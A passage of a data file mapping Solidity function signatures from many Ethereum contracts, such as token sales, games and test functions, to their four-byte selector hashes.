"doStateChanges()": "0xf86282da", "betsLength()": "0xbbd2e01e", "advisorsCliff()": "0x702a3eff", "TOKEN_ICO2_LIMIT()": "0x97b0484e", "CROWDSALE_ACCOUNT()": "0xb32cec45", "getMyCenter()": "0x5b195526", "teamETHAddress()": "0x3dd16673", "tokenIdPointer()": "0x3b3a1a7a", "getIntervals()": "0x492bd276", "unsoldTokenIssued()": "0x9d0f17c8", "insuranceAccount()": "0xcc38c8a0", "mapHeight()": "0xe70b5259", "playCount()": "0x97614302", "bitlumensDelivered()": "0x096b4039", "MINIMUM_BUY_AMOUNT()": "0x3c3e2447", "priceIncrease_20_February()": "0x30eaa9b5", "acceptableAddress()": "0x1da5f94d", "m_token()": "0x7d1ea6d4", "moreThanSoftLimit()": "0xc1cbdff3", "NOT_ENDED_FINE()": "0x8eb98150", "retrieveRemainingCoinsPostSale()": "0x32f58fc8", "holderMarketingTokens()": "0xe0475e27", "consul_nme()": "0xc4f8adc7", "getTokensCount()": "0x3962f82d", "raised()": "0xf0ea4bfc", "maxFees()": "0xe83e34b1", "preSaleBotReserve()": "0x667f1656", "ico4Bonus()": "0xce82eb33", "final_price()": "0x08b309e3", "escrow_fee_denominator()": "0x9d10fda8", "realDevReward()": "0xa8fc1a2a", "PREVIPdeadline()": "0x1a21bb22", "icoFinishedDate()": "0x39408c83", "START_SKO1_UNITS()": "0x43deb8e5", "icoPrice()": "0x34b0e5ed", "icoRound2()": "0x43cbbce6", "blockNumberForVictory()": "0x3a3eda84", "finalizeEarlyBirds()": "0xb798b129", "rewardPool_()": "0x919987bc", "tokensSoftcap()": "0x9e5ee522", "team3LockEndTime()": "0x9b76c1de", "is_signed()": "0xc5868754", "STANDARD()": "0xbcaedade", "walletEmail()": "0x9e20f6c9", "isSetFund()": "0x2d774da2", "finalIntervalForTokenGen()": "0xf26df083", "gasForKWH()": "0x418bc76c", "AUCTION_STARTED()": "0x29fcfeb0", "gateway()": "0x116191b6", "finalTier()": "0x5692b273", "privateSaleMinEth()": "0x57a0685b", "teamTokensDelivered()": "0xd16be71b", "team_coins()": "0x62b78bc4", "getSellUnitsInformations()": "0xb7844170", "GACFund()": "0xc906baa3", "divForPrice()": "0xa0c01e58", "tokensIssuedForBonusRangeOne()": "0x9e90ce6c", "getBurnedCarCount()": "0x687a48a1", "deathData_a3()": "0x6d061b69", "epoch_release_count()": "0x7a518d9f", "_yearThreeSupply()": "0x84e0b689", "moveCharge()": "0xc0b332c1", "tokenPriceUSD()": "0x407fcc31", "isOBR()": "0xd82a6d56", "mainSaleSecondBonus()": "0xe86f2c75", "allocate8ProjectToken()": "0x2b22a18c", "Wallet2()": "0x00f54f0a", "RATE_SALESTAGE3()": "0x3129e6d4", "TOURNAMENT_TOKENS_PERCENT()": "0xf55befee", "oraclizeGasPrice()": "0xce507401", "ICO_SUPPLY()": "0x04269bc2", "bonusTokensIssued()": "0x73b972bc", "content_intro()": "0xd59f1844", "thirdWeek()": "0xbb5e9eab", "rateEarlyStage1()": "0x2c7e06a4", "lockEndBlock()": "0x8587edbb", "getTotalBorrowingItem()": "0x00203385", "init_fund()": "0xc45cda5a", "_minimumBuy()": "0x6b342eb8", "BONUS_THRESHOLD()": "0x22db4143", "weiTotalRefunded()": "0x76de03d0", "getSlots()": "0xfab2c469", "ttlInvestAmount()": "0xa20b8ab3", "yetAnotherTransferTo(address,uint256)": "0xe9bce432", "anotherTransferTo(address,uint256)": "0xa799de7e", "TxOriginContract()": "0x8b37691b", "AO()": "0xdf888f4e", "addBid(string,string,uint256,address)": "0xf6eeb89c", "addListing(string,string,uint256,address)": "0xfeff0506", "listings(uint64)": "0xf4ad8e37", "index()": "0x2986c0e5", "service()": "0xd598d4c9", "ListingDB(uint64,uint64,address)": "0xd0658850", "createSportsBet(string,uint256)": "0x0b8d9d94", "redeemPurchasesForVendor(address)": "0x92817184", "donatePurchase(uint32)": "0x3351ee19", "redeemPurchases()": "0xe118fba2", "makePurchaseForClient(address,address,uint32)": "0x09688000", "refundClient(address,uint32)": "0x0ff7bb07", "makePurchase(address,uint32)": "0x5624e064", "getSavingsBalance(address)": "0x5e4a1d36", "getCheckingBalance(address)": "0x715851a0", "getVested(address)": "0xdec8f52e", "depositSavings(address,uint32)": "0x6930c5da", "depositChecking(address,uint32)": "0x50c15c93", "registerVendor(address)": "0xa6fea6f4", "checkClientFunds(address)": "0x81eac2ee", "registerClient(address,uint32,uint256)": "0x37d9ffd1", "registerDonation(uint32)": "0x669eb768", "Dgp(address)": "0xe98f5708", "Test_SignedInteger_AdditionOverflow(int256)": "0x54e8e4e4", "getTypeByNumber(uint256)": "0x1fc03aa0", "getNameByNumber(uint256)": "0x106be310", "getValueByNumber(uint256)": "0x208df65f", "CardManger()": "0xde91bb10", "stopThrowing()": "0x08a62d0a", "startThrowing()": "0x7f300576", "prefill(address[],uint256[])": "0x73d08bc5", "semanticVersionHash(uint16[3])": "0xfe91d37f", "isValidBump(uint16[3],uint16[3])": "0xa7bdf16e", "getVersionsCount()": "0xc6d48e0d", "getByVersionId(uint256)": "0x737e7d4f", "getBySemanticVersion(uint16[3])": "0x4c3ba268", "getLatestForContractAddress(address)": "0x9a6fe50c", "newVersion(uint16[3],address,bytes)": "0x73053410", "findString(bytes32)": "0xb3d8056d", "checkString(string)": "0xa454b07b", "getCreatedDate()": "0x28aea735", "getResoPeriod()": "0x5cf00394", "getResoDetails()": "0x798f9790", "getResoSCParams()": "0x36eb5b47", "getSignedIndex()": "0x2a3d05cc", "getSignerIndex()": "0x2965558f", "getSignedAddresses()": "0x657206ef", "getSignerAddresses()": "0x914946aa", "getSignedTable()": "0x5d6b70ae", "getSignerTable()": "0xc151c5ad", "getQuorum()": "0xc26c12eb", "getRequiredSigs()": "0x23fcdb20", "getResoMethod()": "0xd9703dac", "getResoType()": "0xbe5648c3", "getTrustContract()": "0x9ed3b61b", "timeCheck()": "0x8f5b0b1c", "sign(address,int256)": "0x945c7438", "TrustReso(uint256[3],address,address,address[])": "0x62773951", "blocktubeTag(string)": "0xc4f54568", "Wallet(bytes32)": "0x92b25a71", "multiowned()": "0xdbd91792", "balanceEth(address,address)": "0x7ffaae3e", "test_insert_zeroKey()": "0xe98bf38e", "test_insert_null()": "0xbed36fee", "test_insert_containsId()": "0xf3b15ffd", "test_insert_full()": "0x9a344170", "test_insert_atPosition()": "0x97c93398", "test_insert_updateTail()": "0x7b564b7f", "test_insert_updateHead()": "0x730b1952", "test_insert_empty()": "0xacc3e283", "test_setMaxSize_decreaseSize()": "0x973885c0", "test_setMaxSize_update()": "0xcf710b73", "test_setMaxSize()": "0xa9985260", "distributeFunds(uint256,address,address,address)": "0xb9068d9e", "DomainSale(address)": "0xf5a2d3c7", "ENSReverseRegister(address,string)": "0x270cf206", "Permissioned()": "0x5435a774", "multiVesting(address[],address,uint256[],uint256[],uint256[])": "0x1ca5df03", "subFromBalance(address,address,uint256)": "0x5321fe04", "currentPart(address,address)": "0xc54e91c6", "addVestingMember(address,address,uint256,uint256,uint256)": "0x41061c04", "ANemoiSaleContract()": "0x9b86975d", "verify(address,bytes32,uint8,bytes32,bytes32)": "0x506535f3", "getAddress(bytes32,uint8,bytes32,bytes32)": "0x364d0b53", "verifySig(address,bytes32,bytes)": "0xb9145944", "acceptSettlement()": "0x793dae12", "BrehonContract(address,address,uint256,address,uint256,uint256,address,uint256,uint256,address,uint256,uint256)": "0x993af624", "redeemEther(uint256)": "0x8535490f", "XToken()": "0xa78e635c", "addMeterpoint(int256,address,int256)": "0xa102e8a5", "delta()": "0x12b495a8", "issue()": "0xd383f646", "FundsRegistryWalletConnector(address[],uint256)": "0x6101f748", "getTimeLeftInQ1()": "0xfd8ae24b", "MomentalyOwned()": "0x94b4c93d", "getDigitFromUint(int256,uint256,uint256,uint8)": "0x600de26a", "getBetInfo(uint256)": "0x79141f80", "getBetsFromAddress(address)": "0xa76a155e", "changeMinimumBetAmount(uint256)": "0xf05a2818", "getGameResult(uint256)": "0xed2df26d", "getGameAmounts(uint256)": "0xfc1e2ce9", "freezeGame(uint256)": "0xb9f24e44", "createNewGame(string,string,string,uint256)": "0xadfdc12f", "changeHouseCutPercentage(uint256)": "0x4036ff30", "transferMultipleSame(address[],uint256)": "0xc3336c0f", "LitecoinOne()": "0x0834fe80", "UBSToken()": "0xbd725f6e", "YanToken()": "0x58e0a9d7", "SeleniumRichChain(uint256,string,uint8,string)": "0xb70dfb25", "arrayOfTokensByAddress(address)": "0xb1cee330", "HealthCoin(uint256)": "0x4e329bd3", "getKevin()": "0xb9a29d42", "setKevin(uint256)": "0x11aa7e26", "EcosystemEthereum()": "0x0f66acd1", "VICToken()": "0xaef5cbee", "EMBCToken()": "0x1533ba50", "setWebInfo(string,string)": "0xfae29ee8", "City(uint256,string,string)": "0xd4aa7d38", "EOSDRAM()": "0x3004ea88", "claimdram()": "0x8dc9650f", "MeltingContract()": "0xf9943133", "LuckToken(uint256,string,string)": "0xfa5201e1", "bulkTransferEther(address[],uint256[])": "0xb27d31de", "canBuyExistentToken(uint256)": "0xeb2a783e", "afterApproveAction(uint256)": "0xb9a4a755", "minPriceForNextRound(uint256)": "0x90731848", "calculateTokenPrice(uint256,uint256)": "0x976c3d04", "updateTierStatus(uint256,uint256)": "0x946f8876", "preMinting(uint256,uint256,uint256,uint256)": "0x87275aba", "transferEthers(address,address,uint256)": "0xcf724096", "approve(uint256,uint256)": "0x5d35a3d9", "calculateAmountOfUnits(uint256,uint256)": "0x89ad0efd", "getCurrentTierStats()": "0x667ec46c", "getCurrentTierIndex()": "0xae6506f9", "claimInternal(address,address)": "0x4ad27ae1", "claimByAddress(address,address)": "0x549d5e3b", "getMetaData(uint256)": "0x61eba552", "changeTokenOwnerByAdmin(uint256,address)": "0x7941d7bd", "artWorkChangeByAdmin(uint256,string,uint256)": "0x4efddcd9", "artWorkChangeApprove(uint256,uint256,bool)": "0xae55f1af", "artWorkChangeRequest(uint256,string,uint8,bytes32,bytes32)": "0x4a2dfbb4", "getArtWorkChangeFee(uint256)": "0x6960a0ed", "getPriceFor(uint256,uint256,uint256,uint256)": "0xa2c8b76b", "initLogo()": "0x55ee684d", "calculateSharesInTheRevenue(uint256,uint256)": "0x26407e36", "calculateMinPriceForNextRound(uint256,uint256)": "0x168f3260", "updateMintingAgent(address,bool)": "0xcd8f8b3c", "copyToAllUnits(uint256,uint256,uint256,uint256,uint256)": "0xbad19ead", "increasePriceForNeighbours(uint256)": "0x4e0d93a3", "calculateCounters(uint256,uint256,uint256,uint256)": "0xa7cc90e9", "inInnerScope(uint256,uint256)": "0xcafbcc8a", "updateOwner(uint256,address,address)": "0xccf24838", "updateTokensState(uint256,uint256)": "0x2047e4af", "mint(address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7ddfffbf", "getTokenCounters(uint256)": "0xa45e1a6e", "getTokenScope(uint256)": "0xe3ed48a4", "getTokenSizes(uint256)": "0x0926b32a", "getTokenUpdatedCounter(uint256)": "0x8997f8cf", "getTokenSoldPrice(uint256)": "0xfc86a7a5", "getCurrentPriceForToken(uint256)": "0xff4c9fa5", "removeTokenMetadata(uint256)": "0x43d6cac5", "increaseUpdateMetadataCounter(uint256)": "0x74f8f7ac", "setTokenMetadata(uint256,string)": "0x510ef1de", "unitExists(uint256,uint256)": "0x9d58a5b6", "setPlatformWallet(address)": "0x8831e9cf", "setMinResalePercentage(uint256)": "0xf52706c9", "setTierData(uint256,uint256,uint256)": "0x8acf94df", "setFeeForArtWorkChangeRequest(uint256)": "0x8d822615", "setFeeForFirstArtWorkChangeRequest(uint256)": "0xe4ada9fa", "setLogoPrice(uint256)": "0xce27a21a", "setSigner(address,address,bool)": "0xa1dc139d", "removeGlobalAdmin(address,address)": "0x7cf141fd", "addGlobalAdmin(address,address)": "0x25250519", "MajestyAssetsJunction()": "0x4f192fa3", "migrationReceiver_setup()": "0x0839e0fb", "HDhundun()": "0x697a2902", "sendInternally(uint256,uint256)": "0xbae3c066", "BAC()": "0x836c67d7", "Fpgcchain(uint256,string,string)": "0x37ba1b4d", "EtherToken2()": "0xd337e72e", "_concat(string,string)": "0xba02f006", "countryItems(uint256,uint256,uint256)": "0x54b8dd66", "allItems(uint256,uint256)": "0xde21cd78", "countryOf(uint256)": "0xfce48558", "countrySupply(uint256)": "0x6d2c51a7", "calculateCountryCut(uint256)": "0x49f73d3d", "listItem(uint256,uint256,uint256,address)": "0x83d8bae3", "listMultipleItems(uint256[],uint256[],uint256,address)": "0xf567a72a", "setCountryToken(address)": "0x320e028d", "admins()": "0xa5de3619", "resolveEmergency()": "0x15c73afd", "declareEmergency(string)": "0xa55231f4", "clearAdmins()": "0x1114fce5", "setRollAddress(address)": "0x08dcf4f1", "getUserGroups(address)": "0x3da04e4a", "getGroupMembers(bytes32)": "0x6c052cd8", "StopToken()": "0x43e6cc64", "NBY()": "0x021c43b4", "VixCoin()": "0x49aa480a", "UBToken()": "0x7c108f84", "pauseSale(bool)": "0x0cfed2a2", "remainingTokensAndCost()": "0xfa147e5e", "freezeAccountDirect(address,bool)": "0xc0be7ad3", "initCongress(address)": "0xd9067fbd", "setOnceMintAmount(uint256)": "0xa28e68d3", "initParams(address)": "0x3d65cf9c", "ownedOwnershipTransferred()": "0xdbf35430", "changeOwnedOwnershipto(address)": "0x57bf04be", "removeAddressFromOwners(address)": "0xe2eb91cc", "isMultiOwner(address)": "0xa6b01e50", "addAddressAsMultiOwner(address,string)": "0x743a3252", "finishInitOwners()": "0xb1aa6dfa", "initAddressAsMultiOwner(address,string)": "0x1c43b4a6", "clearAuth(string)": "0xd9106264", "hasAuth(string)": "0x3be924fa", "deAuthorize(string)": "0x281e1856", "authorize(string)": "0x4f5fcb34", "buyBasicCards_Migrate(address,uint256,uint256)": "0x845b6aca", "BitGuildTrade()": "0x87bc6906", "BellaBluToken()": "0x1cbcb9b9", "generateTokensByList(address[],uint256[])": "0x7981e7f1", "BIGER(address)": "0x51892c0f", "unblockAddress(address)": "0x186d9d88", "blockAddress(address)": "0xad2bb1b3", "NotusNetwork()": "0xe80a4df7", "QuickChain()": "0xad70fbc8", "distribute(address,address[],uint256[])": "0x15270ace", "getSaveData(address,address)": "0xb58b9d5c", "putSaveData(address,address,string)": "0xc4eb2b3c", "switchAdmin(address)": "0x732617bb", "getApprovers()": "0x6cb3e8ef", "isInMaintainance()": "0x4ca8c1e8", "setMaintainance(bool)": "0xdc9d625b", "withdrawEtherBalance(uint256)": "0xa904cc53", "depositEtherBalance()": "0x28d879e4", "GetNow()": "0xb56ebf42", "getReferralCount(uint256)": "0xa30376b7", "getReferralCounts()": "0xfd60e1a8", "getAddressesCount()": "0x47293d15", "GetPlayer_FromID(uint32,uint8)": "0x1318b88c", "GetPlayer_FromAddr(address,uint8)": "0xea59a4e8", "GetReferralInfo()": "0x8856d517", "GetSaleInfo(uint8)": "0x47b87e48", "buySale(uint8,address)": "0xdd4a055b", "buySaleReferred(uint8,address)": "0x5e80377b", "buySaleNonReferral(uint8)": "0x4d536c03", "redeemCards(address,uint8)": "0x06a493fa", "stopSaleType(uint8)": "0x847f4a88", "setSaleType(uint8,uint8,uint32,uint256,uint256)": "0xcc7f608d", "EMPresale()": "0xee10a45d", "NMC(uint256,string,string)": "0x8c86ec20", "LBToken()": "0xed15dafd", "KapelaToken()": "0x2ca23c4f", "AccessToken()": "0xaf40dd2f", "CorporateNews(uint256,string,uint8,string)": "0x8493407b", "THRD()": "0x19c6c6cd", "lock(address,address,uint256,uint256,bool)": "0x8c0d4199", "BoraToken(uint256)": "0xba0d46f3", "getUserBounty(address)": "0x9d097471", "setGroupBounty(address[],uint256)": "0x9c12ca21", "setUsersBounty(address[],uint256[])": "0x461f48cb", "getMintedCounts()": "0x74b527b0", "starCountsForOwner(address)": "0xbc63cc90", "getPicksForUser(address)": "0x922856da", "updateCards(uint8,uint256[])": "0x99851eac", "_arrayContains(uint8[],uint8)": "0xa4c4f172", "makePick(uint8,uint256)": "0x0ed61407", "getGame(uint8)": "0x77d79d10", "updateGame(uint8,uint8[],uint32,uint8,uint8)": "0xe3599c21", "MSCTToken(uint256,string,string)": "0x319f0852", "getTotalTokens(uint256,uint256)": "0xa0f24ea7", "getBonusPercents(uint256)": "0xe517fd54", "setRate_BTCUSD(uint256)": "0x44b786a1", "setRate_ETHUSD(uint256)": "0x8190cf07", "contributeBTC(address,uint256)": "0x40c7e707", "setTrader(address,bool)": "0x7ef59d01", "LightPool()": "0x14b2cd55", "checkPrice(address,address,bool,uint256,uint256)": "0x1fbab493", "LetsbetToken(address,address,address)": "0xb2378428", "ThingschainToken(address)": "0xe3f688d3", "Lpktransfer()": "0x332f7d6e", "buyInternal(address,uint256)": "0xe02243ee", "setRewardBlockThreshold(uint256)": "0x9790268b", "setReputationIRNNodeShare(uint256)": "0xc8ee2da8", "setDefaultReputationReward(uint256)": "0xe1dcafa3", "setActivationFee(uint256)": "0xc3548647", "setRegistrationFee(uint256)": "0xc320c727", "ZenAD()": "0xe3e42b0c", "HyperToken()": "0xffc3f1f2", "buyParticipationTokens(uint256)": "0x58ab010d", "getOrCreatePreviousPreviousFeeWindow()": "0x4f803516", "getIconiqMaxInvestment(address)": "0x60b99afb", "vreoSaleOngoing()": "0xfecab4bf", "iconiqSaleOngoing()": "0xdc9ac994", "withdrawInvestment()": "0xbf3e394e", "verifyInvestors(address[])": "0xc69b5dfb", "failSafeAddWhenGreaterThanIntMax()": "0xabd10e07", "testSubtract()": "0x385e27ed", "failSubtractWhenALessThanB()": "0x2fb767c5", "testAbsMax()": "0x5ad550bc", "testAbsMin()": "0x08245f90", "testAbs()": "0xa41dedcc", "testIsSameSign()": "0xdcede2c3", "testSign()": "0xed8f10df", "HelloWorld()": "0x7fffb7bd", "submitMint(int256,address,uint256)": "0xa2596576", "OpenRegistryRules(address)": "0x65084b76", "setPongAddress(address)": "0x39df1608", "getSendVal()": "0x7a1d8570", "send3MilWeiToPong()": "0x73611c48", "Ping(address)": "0xfee8775b", "setMinimumBet(uint256)": "0x8772ae3c", "guessNumber(uint256)": "0xb438d018", "DiceGame()": "0x9e7e514b", "deployNetwork(address,address)": "0xb436db29", "finalizeSale(address,uint256)": "0x320d2800", "withdrawWallet(address)": "0x8cca5a3f", "finalizeSale(address)": "0xdc8bc70d", "restartSale(address)": "0x4958ace2", "emergencyStopSale(address)": "0xfaab806f", "activateSale(address)": "0x0662572f", "deployAndSetANT(address)": "0x3af76638", "multiply(int256)": "0x1df4f144", "test(int256)": "0x9b22c05d", "setContracts()": "0xe0d6d530", "burnedBitcoin(address,uint256)": "0xf0666fba", "burnCoins()": "0x0ca8fe1e", "showBurnedCoins(address)": "0xd0b91ca7", "getBook(uint256)": "0xe0ff5b8b", "returnBook(uint256,address,address)": "0x35804a88", "borrowBook(uint256,address,address)": "0xf0dd7a5d", "changeBookState(uint256,uint256)": "0xd99dbdbe", "addBook(string)": "0x3bc5f48a", "unregisterUser(address,address)": "0x5cb318bf", "registerUser(address,address,string)": "0xb275ba3a", "unregisterEmployee(address,address)": "0x88758581", "registerEmployee(address,address)": "0x61bedcdc", "unregisterManager(address,address)": "0x498e78b1", "registerManager(address,address)": "0xbd583bff", "Library()": "0x741cdf27", "addThing(string,bytes32,string,string)": "0x39f36220", "takeTokenContractOwnership()": "0xb588fdc1", "setRate(uint256)": "0x34fcf437", "OranguSale(uint256,uint256,uint256,uint256,uint256,address,address,uint256,uint256)": "0x2f4675cd", "slice(bytes,uint256,uint256)": "0xe0041396", "withdrawEthers(uint256)": "0xf4206706", "TestERC20Token()": "0x37fcb747", "testInternalCall()": "0x5cd7815b", "TestFoo()": "0x7a1bba3a", "getNodeId(bytes32)": "0xc62aa67d", "getIndexName(bytes32)": "0x9c05ba60", "getNodeId(bytes32,bytes32)": "0x8148d2fe", "getIndexId(address,bytes32)": "0xd2bbf6df", "test_validProxyFundTransfer()": "0xf4d957a5", "test_validBoardFundTransfer()": "0x747853bc", "test_invalidRuleChange()": "0x1387c80b", "test_validRuleChange()": "0x0de3513a", "test_invalidProxyOwnershipTransfer()": "0x700f4e40", "test_validProxyOwnershipTransfer()": "0xa107994e", "test_invalidProposalExecution()": "0x8a78b7fb", "test_validProposalExecution()": "0x35b75391", "test_voteSpammingFor()": "0x4410121f", "test_voteSpammingAgainst()": "0x735a80b1", "test_invalidSuicide()": "0x183df5ef", "test_againstFor()": "0x13872f8d", "test_forAgainst()": "0x5264ff53", "test_spamVoting()": "0x9b4a6bdb", "test_invalidProposalValue()": "0xaa8f365c", "test_invalidProposalDuration()": "0xbfdcd480", "test_doubleVotingAgainst()": "0xe4b0a97b", "test_doubleVotingFor()": "0x5bae2120", "test_invalidProposalBytecode()": "0x8b49644d", "test_spamFreeze()": "0x256df407", "test_spamApproveAndFreeze()": "0x756e15e5", "test_polarBoardInstance()": "0x62e1de00", "vote(address,uint256,uint256)": "0x2a4a1b73", "newProposal(address,string,address,uint256,address,uint256,bytes)": "0x073cc554", "revokeAdmin(address)": "0x2d345670", "makeAdmin(address)": "0x472905ca", "getCode(uint256)": "0xa6fc5c03", "editCode(uint256,string)": "0x7eefe47e", "makeCode(uint256,string)": "0xe0cbbde7", "getClaims(string)": "0x0e1565c2", "makeClaim(bytes32,string,uint256,bytes32,uint256,uint256,uint8,uint256)": "0x8c39cb93", "trustNet()": "0xeb727714", "requestOwnershipTransfer(address)": "0x0952c504", "returnedData()": "0xe4024194", "defaultInput()": "0x7a872547", "trigger(bytes32)": "0x4c097cb4", "setDelays(uint256,uint256)": "0x7772ba07", "unblock(bytes32)": "0x3958884b", "block(bytes32)": "0xc3c2f066", "WatchedWallet(address,address)": "0x3cdd37e1", "finaliseChannel()": "0x8fae4857", "doBroadcast()": "0x4edefe83", "giveConsent(uint8,bytes32,bytes32)": "0x5f2e0c20", "voteToKickoffNewFiscalYear()": "0xadbda5a8", "completeAt()": "0x4c4cea5a", "minimumPoolPurchase()": "0x54e76d74", "totalBNBContributed()": "0x93632ddd", "ICO_PHASE2_LIMIT()": "0x92bcf0d5", "lmda()": "0x58413194", "LEGEND()": "0x303f5f51", "PRICE_ICO2()": "0x7fd751a8", "minEtherParticipate()": "0xb5a9de6e", "voteCancelCurrent()": "0xe048d0fc", "angelLockingPeriod()": "0x8b5406af", "startTimes()": "0x4c7c71fe", "minimumContributionPhase3()": "0xa5177400", "getBattleTeamSize()": "0x755a8d31", "lastSaleInHGT()": "0x7ca54248", "winReward()": "0xe3ae85f0", "gvpe_per_eos()": "0x6d6755a6", "factorContributed()": "0xe129330b", "m_initialSettingsSet()": "0xa7859131", "getDouble()": "0xa3f1bd35", "totalSupplyLimit()": "0xbac21a22", "onlyAmbassadors()": "0x27defa1f", "robotAddr()": "0x3e4604b3", "RAVI_ALLOCATION()": "0x1309d3bd", "withdrawUserPrize()": "0x60694549", "founderAdress()": "0x0dd0cf9e", "wallet89()": "0x7b775ec3", "payoutMultiplier()": "0x5c812737", "disableAffiliate()": "0x93a0dc08", "PERCENT_DIVIDER()": "0x29fc7bd8", "createBroker()": "0x70620168", "minFundInEther()": "0xb15dc523", "getMatchCount()": "0x8c4f7dae", "IsICOOver()": "0x681f01f2", "airdropReward()": "0x4b71bff3", "icoPhase2EndTime()": "0x323bf0b8", "ratePerWeiSecondPhase()": "0x05a3e81a", "completeUnlockTime()": "0xadf70883", "btcraised()": "0x112b466e", "deadlinePreIcoOne()": "0x60261ce6", "lockFlag()": "0xe3c517a9", "numfails()": "0x5d2230d7", "destEthDevs()": "0x01621527", "maxImmortals()": "0xb51c3d2a", "initialOwner()": "0x29ba7bb2", "CPXWallet()": "0x5101880f", "tokenTransferLocker()": "0x9cdbaa21", "removeSdaContract()": "0x81a752ef", "currentSpiderOwner()": "0x8769bc7e", "unlockDate4()": "0xfb35d545", "CMO()": "0x6ad35d1a", "partnersMintLockEnd()": "0x0dc224ec", "newParityOwner()": "0x94bd5cb6", "numGamesCanceled()": "0xdc46d984", "startCompanySell()": "0x70597cb1", "pkt()": "0xc176e73b", "weisPerEther()": "0xc3bb68cf", "end_redeem_period()": "0xbbcef175", "presalePurchasesLoaded()": "0xa25c1f3a", "MainSaleDistributed()": "0x4be62668", "TOTAL_TEAMS()": "0x79b466b0", "buyLambo()": "0x4584afe5", "TOKEN_AMOUNT_ICO_STAGE1_PRE_SALE3()": "0xc9ad51b5", "TOKENS_MAX()": "0xa67e91a8", "ICO3Period()": "0xf06d56ae", "tempCharity()": "0xa99fc5aa", "VESTING_2_AMOUNT()": "0x2e84bed8", "t_ImmlaBountyTokenDepository()": "0xaf261875", "coAdmin()": "0x06900a40", "RELEASE_DATE()": "0x309d094b", "CFCdistrubution()": "0x38bef35c", "angelWheelFinanceSupply()": "0xd86c5bf7", "rewardUnicornAmount()": "0x4893de2a", "hardCapHash()": "0xc2dc9af4", "fundcruToken()": "0xc6ae67ad", "punterWaiting()": "0x9d535056", "priceStepDuration()": "0x5651ce38", "lastBlock_a11Hash_uint256()": "0xf765ec6f", "playToken()": "0xe3cb8563", "radtokenSupply()": "0x5f3c15ed", "totalCommissionOwed()": "0x8fbea5c9", "assigned_shares()": "0x44a926f9", "tokensaleBuyTokens()": "0x6e034f4d", "IOV()": "0x7c475ade", "SaleCapReached()": "0x26e56c05", "_price_token_ICO1()": "0xcd187043", "frozenAccountICO()": "0x6cde3c75", "curentWinner()": "0x25a52d9d", "REFUND_TIME_FRAME()": "0x25fd1e29", "unfreezePrice()": "0x58cf7c71", "ICOBeginsAt()": "0x0dfd085a", "totalPreICOSupply()": "0xfd39ba59", "preIcoPhaseCountdown()": "0xb77f00b3", "ADVISORY_BOARD_TOKENS()": "0xae63b517", "against()": "0xdc50af26", "captains()": "0x3c6b9d8c", "lotusWallet75Pct()": "0xac7b986f", "ONE_EMONT()": "0x54f60aea", "TOTAL_SUPPLY_LIMIT()": "0xcc3bde3d", "emaPeriods()": "0x2c9f6792", "stopGo()": "0xed91c906", "sgcToken()": "0x73a97787", "momFab()": "0x0253fbd1", "unlockBlock()": "0xea35df16", "tokensPerEthPrice()": "0x1a5e2110", "maxTokensForCommand()": "0xd3059c91", "refferalsRateBonus()": "0xb2d48237", "icoTokenPrice()": "0x5c0e6bc4", "requiredBet()": "0xf33d0f3a", "turnOffCanUpdateDeveloperMiningPower()": "0xc67685a9", "prizeMoneyAsset()": "0x3a8a0a5c", "numVideos()": "0xebec7352", "rate_ETHUSD()": "0xdabb624b", "etherInWei()": "0xe18c8cf9", "roundSwitch()": "0xaf6b3d43", "issued()": "0x5f1ff549", "ethFundDepositAddress()": "0xe70c052a", "isIcoFailed()": "0xfcc9b48c", "lockSales()": "0xfa23023b", "moneybackaddr()": "0x4a81db9a", "referralPercentOfTotal()": "0x70c35951", "ethFundAddress()": "0x24497829", "_total_sold()": "0xc6e3a9b3", "withdrawJuror()": "0xb63005ec", "teamTokensMinted()": "0x22cb1ec8", "evolvePrice()": "0x91cadaf6", "isMaximumGoalReached()": "0xdc542a79", "ShareManager()": "0xe22938bd", "percentageQuarter3()": "0x2aaa49f5", "addressReserve()": "0xaee145f7", "preSaleContributions()": "0x705b7efd", "getTotalCap()": "0xa60b693d", "getTimeOfLastBid()": "0x24f073ad", "ethereumFoundationTickets()": "0xa5a7d086", "grantsStartTimestamp()": "0x10780cce", "presaleParticipationMinimum()": "0x869f1c00", "totalBlocks()": "0xfacbf93b", "contributorsAddress()": "0xe9aa80b1", "getFree()": "0x2be65e2a", "maintenance_mode()": "0x20cf3e1f", "getCertificateSince()": "0xeaf6d212", "fortune_break_current()": "0xd72f7958", "promisedTokenBalance()": "0x5f73d6c0", "saleFee()": "0x178021e3", "cntMembers()": "0xdfc3a987", "devFeePaid()": "0x68f5ccdf", "RETURN_DATE()": "0xd2169dfd", "isSelling()": "0xcbf21837", "option10symbol()": "0x4d46474a", "is_alive()": "0x1d2531f3", "DevSupply_Released()": "0x43c273c7", "afterVoteNoCashBackTime()": "0x2c684eb6", "motto()": "0x5dec18d4", "howManyEtherInWeiToBecomeOwner()": "0x581515fd", "APOLLOCOIN_COMPANY_AMOUNT()": "0xa022e283", "animator()": "0x31c2b6e6", "RATE4()": "0x4de970fd", "feeDenominator()": "0x180b0d7e", "ethreceived()": "0x0d38ea48", "ApexIssued()": "0x8098f67c", "current_start_divholder()": "0x62373537", "namiMultiSigWallet()": "0x0321f836", "takeOver()": "0xed14b6a5", "releaseTokensBlock()": "0x438c3585", "StageThreeEnable()": "0x6376c910", "yearTwoMultiplier()": "0x59ea2647", "CreationRate()": "0x0a49646b", "totalNormalEtherCollected()": "0xd17a79c1", "_tokenLeft()": "0xb2a5bc70", "hardCapHighUsd()": "0x014d0f68", "BASE_AMO_TO_ETH_RATE()": "0x2132ce0a", "place()": "0x93cca918", "oracleFee()": "0xf9cd3ceb", "getHouseCardsNumber()": "0x7f601a50", "preSaleTLYperETH()": "0x3fbc2a1e", "complianceAddress()": "0xfda79925", "telcoin()": "0x5482d88e", "verify_fund()": "0xcb7c05e7", "main_balance()": "0x8161c5e5", "lockPeriodForBuyers()": "0x86eb3899", "saleLimitReachedForCurrentStage()": "0x69b29b51", "mainICOFourthWeekEndTime()": "0x9b9b0b87", "tenthTotal()": "0x8ccb381b", "setICO2Phase()": "0x34bdea85", "recipientString()": "0xb2e7c288", "primary_wallet()": "0xb0471d43", "devsHolder()": "0x813f563a", "isBuyBackTwo()": "0x8ff0c391", "presaleBonusTier2()": "0xe76abcb9", "transferred_total()": "0xb4330e24", "secondVestStartsAt()": "0xd22b1a0f", "demurringFeeOwner()": "0x210ba961", "oneTokenInEur()": "0x96c8da45", "PRESALE_CLOSING_TIME()": "0x81550287", "lastTicketNumber()": "0x4635ecd5", "businessAddress()": "0x1583deb2", 